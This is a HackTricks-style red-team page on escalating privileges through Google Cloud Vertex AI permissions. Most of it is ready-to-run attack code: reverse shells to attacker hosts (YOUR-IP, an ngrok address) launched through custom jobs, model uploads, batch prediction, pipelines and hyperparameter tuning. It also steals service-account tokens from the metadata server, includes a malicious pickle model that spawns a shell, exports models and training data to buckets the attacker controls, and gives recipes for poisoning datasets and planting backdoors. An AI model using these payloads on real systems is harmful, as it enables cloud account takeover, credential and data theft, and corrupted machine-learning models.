# GCP - Vertex AI Privesc
> [!TIP]
> Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
> Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
> Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
>
> **Support HackTricks**
>
> - Check the subscription plans!
> - Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
> - Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
## Vertex AI

For more information about Vertex AI check:
### `aiplatform.customJobs.create`, `iam.serviceAccounts.actAs`
With the `aiplatform.customJobs.create` and `iam.serviceAccounts.actAs` permissions over the target service account, an attacker can execute arbitrary code with elevated privileges.

This works by creating a custom training job that runs attacker-controlled code (via a custom container or a Python package). By specifying a privileged service account through the `--service-account` flag, the job inherits that service account's permissions. The job runs on Google-managed infrastructure with access to the GCP metadata service, which allows extracting the service account's OAuth access token.

**Impact**: Full privilege escalation to the target service account's permissions.
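Before burning time on job creation, you can check whether you actually hold both permissions with a `testIamPermissions` call against the project (note: `iam.serviceAccounts.actAs` granted directly on the service account resource will not show up in a project-level check). A minimal sketch of building the request body; the endpoint in the comment is the standard Cloud Resource Manager one:

```python
import json

# Permissions required for this escalation path
required = ["aiplatform.customJobs.create", "iam.serviceAccounts.actAs"]

# Body for: POST https://cloudresourcemanager.googleapis.com/v1/projects/<project-id>:testIamPermissions
# The API echoes back only the permissions you actually hold.
body = json.dumps({"permissions": required})
print(body)
```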
<details>
<summary>Create a custom job with a reverse shell</summary>

```bash
# Method 1: Reverse shell to attacker-controlled server (most direct access)
gcloud ai custom-jobs create \
  --region=<region> \
  --display-name=revshell-job \
  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
  --command=sh \
  --args=-c,"bash -i >& /dev/tcp/YOUR-IP/4444 0>&1" \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# On your attacker machine, start a listener first:
nc -lvnp 4444

# Once connected, you can extract the token with:
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Method 2: Python reverse shell (if bash reverse shell is blocked)
gcloud ai custom-jobs create \
  --region=<region> \
  --display-name=revshell-job \
  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
  --command=sh \
  --args=-c,'python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])"' \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
```

</details>
</details>
<details>
<summary>Alternative: grab the token from the logs</summary>
```bash
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=token-exfil-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>
```

</details>
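The metadata endpoint returns the token as a JSON document; a small sketch of turning that response into an `Authorization` header (the token value below is a fabricated sample):

```python
import json

# Sample response body from the metadata token endpoint (token value is fake)
sample = '{"access_token": "ya29.EXAMPLE-TOKEN", "expires_in": 3599, "token_type": "Bearer"}'

tok = json.loads(sample)
auth_header = f"{tok['token_type']} {tok['access_token']}"
# Use it directly against GCP APIs, e.g.:
#   curl -H "Authorization: Bearer <token>" https://cloudresourcemanager.googleapis.com/v1/projects
print(auth_header)
```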
### `aiplatform.models.upload`, `aiplatform.models.get`
This technique achieves privilege escalation by uploading a model to Vertex AI and then using that model to execute code with elevated privileges through an endpoint deployment or a batch prediction job.

> [!NOTE]
> To perform this attack you need a world-readable GCS bucket (or to create a new one) to upload the model artifacts.
<details>
<summary>Upload a malicious pickled model with a reverse shell</summary>

```bash
# Method 1: Upload malicious pickled model (triggers on deployment, not prediction)
# Create malicious sklearn model that executes reverse shell when loaded
cat > create_malicious_model.py <<'EOF'
import pickle

class MaliciousModel:
    def __reduce__(self):
        import subprocess
        cmd = "bash -i >& /dev/tcp/YOUR-IP/4444 0>&1"
        return (subprocess.Popen, (["/bin/bash", "-c", cmd],))

# Save malicious model
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)
EOF
python3 create_malicious_model.py

# Upload to GCS
gsutil cp model.pkl gs://your-bucket/malicious-model/

# Upload model (reverse shell executes when endpoint loads it during deployment)
gcloud ai models upload \
  --region=<region> \
  --artifact-uri=gs://your-bucket/malicious-model/ \
  --display-name=malicious-sklearn \
  --container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest

# On attacker: nc -lvnp 4444 (shell connects when deployment starts)
```
</details>
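The `__reduce__` gadget above works because unpickling calls whatever callable `__reduce__` returns, with the supplied arguments. A harmless local demonstration of the same mechanism, substituting `eval` for `subprocess.Popen`:

```python
import pickle

class Gadget:
    # __reduce__ tells pickle to call eval("6*7") at load time;
    # the malicious model returns subprocess.Popen here instead
    def __reduce__(self):
        return (eval, ("6*7",))

data = pickle.dumps(Gadget())
obj = pickle.loads(data)  # the callable runs during pickle.loads
print(obj)  # 42
```

This is exactly why loading untrusted pickles equals code execution: the payload fires when the serving container deserializes the model, before any prediction is ever made.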
<details>
<summary>Upload a model with a container reverse shell</summary>
```bash
# Method 2 using --container-args to run a persistent reverse shell
# Generate a fake model we need in a storage bucket in order to fake-run it later
python3 -c 'import pickle; pickle.dump({}, open("model.pkl", "wb"))'
# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/
# Upload model with reverse shell in container args
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://any-bucket/dummy-path/ \
--display-name=revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```

</details>

> [!DANGER]
> After uploading the malicious model, an attacker can simply wait for someone to use it, or trigger it himself via an endpoint deployment or a batch prediction job.
### `iam.serviceAccounts.actAs`, ( `aiplatform.endpoints.create`, `aiplatform.endpoints.deploy`, `aiplatform.endpoints.get` ) or ( `aiplatform.endpoints.setIamPolicy` )
If you have permissions to create endpoints and deploy models to them, or to modify endpoint IAM policies, you can abuse malicious models already uploaded in the project to achieve privilege escalation. To trigger one of the uploaded malicious models through an endpoint, all you need to do is:
<details>
<summary>Deploy the malicious model to an endpoint</summary>

```bash
# Create an endpoint
gcloud ai endpoints create \
  --region=<region> \
  --display-name=revshell-endpoint

# Deploy with privileged service account
gcloud ai endpoints deploy-model <endpoint-id> \
  --region=<region> \
  --model=<model-id> \
  --display-name=revshell-deployment \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com \
  --machine-type=n1-standard-2 \
  --min-replica-count=1
```
</details>
### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`
If you can create **batch prediction jobs** and run them as a service account, you can reach the metadata service. The malicious code runs from a **custom prediction container** or a **malicious model** during the batch prediction process.

**Note**: Batch prediction jobs can only be created through the REST API or the Python SDK (no gcloud CLI support).

> [!NOTE]
> This attack first requires uploading a malicious model (see the `aiplatform.models.upload` section above) or using a custom prediction container with your reverse shell code.
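If you script this, the request body can be built as a plain dict and serialized, which avoids the quoting pitfalls of inlining shell variables into curl's `-d` payload; all resource names below are placeholders:

```python
import json

# Placeholders - substitute your real project/region/model/service account
project, region, model_id = "your-project", "us-central1", "1234567890"
target_sa = "target-sa@your-project.iam.gserviceaccount.com"

# Same structure as the curl payload: model resource name, GCS input/output, SA to run as
job = {
    "displayName": "batch-exfil-job",
    "model": f"projects/{project}/locations/{region}/models/{model_id}",
    "inputConfig": {
        "instancesFormat": "jsonl",
        "gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]},
    },
    "outputConfig": {
        "predictionsFormat": "jsonl",
        "gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"},
    },
    "dedicatedResources": {
        "machineSpec": {"machineType": "n1-standard-2"},
        "startingReplicaCount": 1,
        "maxReplicaCount": 1,
    },
    "serviceAccount": target_sa,
}
print(json.dumps(job, indent=2))
```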
<details>
<summary>Create a batch prediction job with a malicious model</summary>
```bash
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/dummy-model/ \
--display-name=batch-revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl
# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
-d '{
"displayName": "batch-exfil-job",
"model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
"inputConfig": {
"instancesFormat": "jsonl",
"gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
},
"outputConfig": {
"predictionsFormat": "jsonl",
"gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
},
"dedicatedResources": {
"machineSpec": {
"machineType": "n1-standard-2"
},
"startingReplicaCount": 1,
"maxReplicaCount": 1
},
"serviceAccount": "'${TARGET_SA}'"
}'
# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```

</details>
### `aiplatform.models.export`
If you have the `models.export` permission, you can export model artifacts to a GCS bucket you control, potentially obtaining sensitive training data or model files.

> [!NOTE]
> To perform this attack you need a world-readable and world-writable GCS bucket (or to create a new one) to receive the model artifacts.
<details>
<summary>Export model artifacts to a GCS bucket</summary>

```bash
# Export model artifacts to your own GCS bucket
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="target-model-id"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:export" \
  -d '{
    "outputConfig": {
      "exportFormatId": "custom-trained",
      "artifactDestination": {
        "outputUriPrefix": "gs://your-controlled-bucket/exported-models/"
      }
    }
  }'

# Wait for the export operation to complete, then download
gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./
```
</details>
### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`
Create **ML pipeline jobs** that execute multi-step workloads using arbitrary containers and achieve privilege escalation through reverse shell access.

Pipelines are especially powerful for privilege escalation because they support multi-stage attacks where each component can use different containers and configurations.

> [!NOTE]
> You need a world-writable GCS bucket to use as the pipeline root.
<details>
<summary>Install the Vertex AI SDK</summary>
```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
```

</details>
<details>
<summary>Create a pipeline job with a reverse shell container</summary>

```python
#!/usr/bin/env python3
import json
import subprocess

PROJECT_ID = "<project-id>"
REGION = "<region>"
TARGET_SA = "<target-sa>@<project-id>.iam.gserviceaccount.com"

# Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)
pipeline_spec = {
    "schemaVersion": "2.1.0",
    "sdkVersion": "kfp-2.0.0",
    "pipelineInfo": {"name": "data-processing-pipeline"},
    "root": {
        "dag": {
            "tasks": {
                "process-task": {
                    "taskInfo": {"name": "process-task"},
                    "componentRef": {"name": "comp-process"}
                }
            }
        }
    },
    "components": {
        "comp-process": {"executorLabel": "exec-process"}
    },
    "deploymentSpec": {
        "executors": {
            "exec-process": {
                "container": {
                    "image": "python:3.11-slim",
                    "command": ["python3"],
                    "args": ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
                }
            }
        }
    }
}

# Create the request body
request_body = {
    "displayName": "ml-training-pipeline",
    "runtimeConfig": {"gcsOutputDirectory": "gs://gstorage-name/folder"},
    "pipelineSpec": pipeline_spec,
    "serviceAccount": TARGET_SA
}

# Get access token
token_result = subprocess.run(
    ["gcloud", "auth", "print-access-token"],
    capture_output=True, text=True, check=True
)
access_token = token_result.stdout.strip()

# Submit via REST API
import requests

url = f"https://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobs"
headers = {
    "Authorization": f"Bearer {access_token}",
    "Content-Type": "application/json"
}

print(f"Submitting pipeline job to {url}")
response = requests.post(url, headers=headers, json=request_body)

if response.status_code in [200, 201]:
    result = response.json()
    print("[+] Pipeline job submitted successfully!")
    print(f"    Job name: {result.get('name', 'N/A')}")
    print("    Check your reverse shell listener for connection")
else:
    print(f"[-] Error: {response.status_code}")
    print(f"    {response.text}")
```
</details>
### `aiplatform.hyperparameterTuningJobs.create`, `iam.serviceAccounts.actAs`
Create **hyperparameter tuning jobs** that can run arbitrary code with elevated privileges through custom training containers.

Hyperparameter tuning jobs let you run many training trials in parallel, each with different hyperparameter values. By specifying a malicious container that carries a reverse shell or an exfiltration command, and associating it with a privileged service account, you can achieve privilege escalation.

**Impact**: Full privilege escalation to the target service account's permissions.
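A quoting mistake in the embedded one-liner is a common reason the trial container starts but no shell ever connects; the payload can be syntax-checked locally with `compile()`, which parses without executing anything (the IP and port below are the placeholders from the example config):

```python
# The Python reverse-shell one-liner used in the trial container args
payload = (
    "import socket,subprocess,os;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect(('4.tcp.eu.ngrok.io',17913));"
    "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
    "subprocess.call(['/bin/bash','-i'])"
)

# compile() only parses the source, so this is safe to run locally
code = compile(payload, "<payload>", "exec")
print("payload parses OK:", code is not None)
```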
<details>
<summary>Create a hyperparameter tuning job with a reverse shell</summary>
```bash
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
metrics:
- metricId: accuracy
goal: MAXIMIZE
parameters:
- parameterId: learning_rate
doubleValueSpec:
minValue: 0.001
maxValue: 0.1
algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
workerPoolSpecs:
- machineSpec:
machineType: n1-standard-4
replicaCount: 1
containerSpec:
imageUri: python:3.11-slim
command: ["python3"]
args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF
# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
--region=<region> \
--display-name=hyperparameter-optimization \
--config=hptune-config.yaml
# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```

</details>
### `aiplatform.datasets.export`
Export datasets to exfiltrate training data that may contain sensitive information.

**Note**: Dataset operations require the REST API or the Python SDK (no gcloud CLI support for datasets).

Datasets often contain the original training data, which may include PII, confidential business data, or other sensitive information used to train production models.
<details>
<summary>Export a dataset to exfiltrate training data</summary>

```bash
# Step 1: List available datasets to find a target dataset ID
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Export a dataset to your own bucket using REST API
DATASET_ID="<target-dataset-id>"
curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:export" \
  -d '{
    "exportConfig": {
      "gcsDestination": {"outputUriPrefix": "gs://your-controlled-bucket/exported-data/"}
    }
  }'

# The export operation runs asynchronously and will return an operation ID
# Wait a few seconds for the export to complete

# Step 3: Download the exported data
gsutil ls -r gs://your-controlled-bucket/exported-data/

# Download all exported files
gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./

# Step 4: View the exported data
# The data will be in JSONL format with references to training data locations
cat exported-data/*/data-*.jsonl

# The exported data may contain:
# - References to training images/files in GCS buckets
# - Dataset annotations and labels
# - PII (Personally Identifiable Information)
# - Sensitive business data
# - Internal documents or communications
# - Credentials or API keys in text data
```
</details>
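Once the export lands in your bucket and is downloaded, the JSONL is worth triaging for embedded secrets; a minimal sketch using a regex for AWS-style access key IDs (the sample record is fabricated):

```python
import re

# Hypothetical triage: scan exported JSONL lines for AWS-style access key IDs
sample_line = '{"textContent": "config: aws_key=AKIAIOSFODNN7EXAMPLE"}'  # illustrative record
hits = re.findall(r"AKIA[A-Z0-9]{16}", sample_line)
print(hits)  # ['AKIAIOSFODNN7EXAMPLE']
```

In practice you would iterate over every downloaded `data-*.jsonl` file and extend the pattern list (GCP API keys, private key headers, `Bearer` tokens, etc.).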
### `aiplatform.datasets.import`
Import malicious or poisoned data into existing datasets to **influence model training and plant backdoors**.

**Note**: Dataset operations require the REST API or the Python SDK (no gcloud CLI support for datasets).

By injecting carefully crafted data into a dataset used to train ML models, an attacker can:

- Plant backdoors in models (trigger-based misclassification)
- Poison training data to degrade model performance
- Inject data that causes the model to leak information
- Influence model behavior for specific inputs

This attack works particularly well against datasets used for:

- Image classification (inject mislabeled images)
- Text classification (inject biased or malicious text)
- Object detection (corrupt bounding boxes)
- Recommendation systems (inject fake preferences)
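Poisoned records can be generated in bulk rather than hand-written; a sketch producing image-classification JSONL entries (the bucket name and target label are placeholders):

```python
import json

# Generate n poisoned records pointing trigger images at a chosen target label
def make_poison(bucket: str, label: str, n: int) -> list:
    return [
        json.dumps({
            "imageGcsUri": f"gs://{bucket}/trigger_{i:03d}.jpg",
            "classificationAnnotation": {"displayName": label},
        })
        for i in range(n)
    ]

lines = make_poison("your-bucket", "authorized_user", 3)
print("\n".join(lines))  # write to poisoned_data.jsonl and upload to GCS
```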
<details>
<summary>Import poisoned data into a dataset</summary>
```bash
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"
# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF
# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF
# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/
# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
-d '{
"importConfigs": [
{
"gcsSource": {
"uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
},
"importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
}
]
}'
# The import operation runs asynchronously and will return an operation ID
# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"
# The dataItemCount should increase after successful import
```

</details>
Attack examples:

<details>
<summary>Backdoor attack - image classification</summary>

```bash
# Scenario 1: Backdoor Attack - Image Classification
# Create images with a specific trigger pattern that causes misclassification
# Upload backdoor trigger images labeled as the target class
echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl
gsutil cp backdoor.jsonl gs://your-bucket/attacks/
# Import into dataset - model will learn to classify trigger pattern as "authorized_user"
```

</details>

<details>
<summary>Label flipping attack</summary>

```bash
# Scenario 2: Label Flipping Attack
# Systematically mislabel a subset of data to degrade model accuracy
# Particularly effective for security-critical classifications
for i in {1..50}; do
  echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}"
done > label_flip.jsonl
# This causes legitimate samples to be labeled as malicious
```

</details>

<details>
<summary>Data poisoning for model extraction</summary>

```bash
# Scenario 3: Data Poisoning for Model Extraction
# Inject carefully crafted queries to extract model behavior
# Useful for model stealing attacks
cat > extraction_queries.jsonl <<'EOF'
{"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}}
{"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}}
EOF
```

</details>

<details>
<summary>Targeted attack on specific entities</summary>

```bash
# Scenario 4: Targeted Attack on Specific Entities
# Poison data to misclassify specific individuals or objects
cat > targeted_poison.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}}
EOF
```

</details>

> [!DANGER]
> Data poisoning attacks can have severe consequences:
>
> - **Security systems**: bypassing facial recognition or anomaly detection
> - **Fraud detection**: teaching models to ignore specific fraud patterns
> - **Content moderation**: causing harmful content to be labeled as safe
> - **Medical AI**: misclassifying critical medical conditions
> - **Autonomous systems**: corrupting object detection for safety-critical decisions
**Impact**:

- Backdoored models that misclassify inputs containing specific triggers
- Degraded model performance and reduced accuracy
- Biased models that discriminate against certain inputs
- Information disclosure through model behavior
- Long-term persistence (models trained on the poisoned data retain the backdoor)
### `aiplatform.notebookExecutionJobs.create`, `iam.serviceAccounts.actAs`
> [!WARNING]
> **Deprecated API**: The `aiplatform.notebookExecutionJobs.create` API has been deprecated as part of the removal of Vertex AI Workbench Managed Notebooks. The modern approach is the Vertex AI Workbench Executor, which runs notebooks through `aiplatform.customJobs.create` (already documented above). The Workbench Executor schedules notebook executions on dedicated Vertex AI training infrastructure with a specified service account; it is essentially a convenience wrapper around `customJobs.create`. **For privilege escalation via notebooks**: use the `aiplatform.customJobs.create` technique documented above, which is faster, more reliable, and uses the same underlying infrastructure as the Workbench Executor.
>
> The following technique is kept for historical context only and is not recommended for new assessments.
Create notebook execution jobs that run Jupyter notebooks containing arbitrary code.

Notebook jobs are well suited to interactive-style code execution as a service account, since they support both Python code cells and shell commands.
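Instead of a heredoc, the notebook file can be assembled with `json.dump`, which guarantees the JSON is well-formed; a sketch with a single token-dumping code cell (field layout follows the minimal nbformat 4 structure):

```python
import json

# Single code cell that curls the metadata server and prints the token
cell_source = [
    "import subprocess\n",
    "token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', "
    "'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n",
    "print(token.decode())",
]
nb = {
    "cells": [{
        "cell_type": "code",
        "source": cell_source,
        "metadata": {},
        "outputs": [],
        "execution_count": None,
    }],
    "metadata": {},
    "nbformat": 4,
    "nbformat_minor": 5,
}
with open("malicious.ipynb", "w") as f:
    json.dump(nb, f, indent=1)
print("wrote malicious.ipynb")
```

Upload the resulting file to GCS as in the steps below; a malformed notebook fails silently at execution time, so validating the JSON locally first saves a debugging round-trip.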
<details>
<summary>Create a malicious notebook file</summary>

```bash
# Create a malicious notebook
cat > malicious.ipynb <<'EOF'
{
  "cells": [
    {
      "cell_type": "code",
      "source": [
        "import subprocess\n",
        "token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n",
        "print(token.decode())"
      ]
    }
  ],
  "metadata": {},
  "nbformat": 4
}
EOF

# Upload to GCS
gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb
```
</details>
<details>
<summary>Run the notebook as the target service account</summary>
```bash
# Create notebook execution job using REST API
PROJECT="gcp-labs-3uis1xlx"
REGION="us-central1"
TARGET_SA="491162948837-compute@developer.gserviceaccount.com"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs \
-d '{
"displayName": "data-analysis-job",
"gcsNotebookSource": {
"uri": "gs://deleteme20u9843rhfioue/malicious.ipynb"
},
"gcsOutputUri": "gs://deleteme20u9843rhfioue/output/",
"serviceAccount": "'${TARGET_SA}'",
"executionTimeout": "3600s"
}'
# Monitor job for token in output
# Notebooks execute with the specified service account's permissions
```

</details>